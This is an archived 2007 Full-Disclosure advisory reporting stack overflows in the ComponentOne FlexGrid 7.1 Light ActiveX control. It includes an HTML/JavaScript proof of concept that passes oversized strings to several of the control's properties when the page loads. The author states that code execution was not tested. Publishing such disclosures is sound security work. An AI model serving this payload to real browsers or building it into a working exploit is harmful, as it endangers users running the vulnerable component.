Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  ComponentOne FlexGrid ActiveX multiple buffer overflows

From:Elazar Broad <elazarb_(at)_earthlink.net>
Date:17.11.2007
Subject:[Full-disclosure] ComponentOne FlexGrid 7.1 Light Multiple Stack Overflows

The ComponentOne FlexGrid 7.1 (VSFlexGrid.VSFlexGridL) has multiple stack overflows. I have not tested code execution nor do I remember what this component was installed with. PoC as follows:

--------------------
<!--
written by e.b.
-->
<html>
<head>
 <script language="JavaScript" DEFER>
   function Check() {
    var s = "AAAA";

    while (s.length < 262145) s=s+s;
 
    var obj = new ActiveXObject("VSFlexGrid.VSFlexGridL");
    
    obj.Text = s;
    obj.EditSelText = s;
    obj.EditText = s;
    obj.CellFontName = s;
  }
 </script>

</head>  
<body onload="JavaScript: return Check();" />
</html>
--------------------

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru